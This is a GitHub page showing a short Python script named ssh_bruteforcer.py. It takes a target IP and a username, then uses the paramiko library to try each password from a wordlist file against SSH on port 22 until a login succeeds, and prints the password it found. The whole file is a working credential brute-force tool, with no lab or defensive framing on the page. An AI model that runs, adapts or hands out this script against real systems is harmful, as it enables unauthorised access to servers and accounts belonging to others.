-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathssh_bruteforcer.py
More file actions
34 lines (28 loc) · 876 Bytes
/
ssh_bruteforcer.py
File metadata and controls
34 lines (28 loc) · 876 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import paramiko
import sys
import os
target_ip = str(input("Enter target IP Address :"))
username = str(input("Enter the username :"))
def ssh_connect(password):
code = 0
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(target_ip, port=22, username=username, password=password)
except paramiko.AuthenticationException:
code = 1
ssh.close()
return code
with open("wordlist2.txt", "r") as file :
for line in file.readlines():
password = line.strip()
try :
response = ssh_connect(password)
if response == 0:
print("Password :", password)
exit(0)
elif response == 1:
print("No Luck in finding the password")
except Exception as e:
print(e)
pass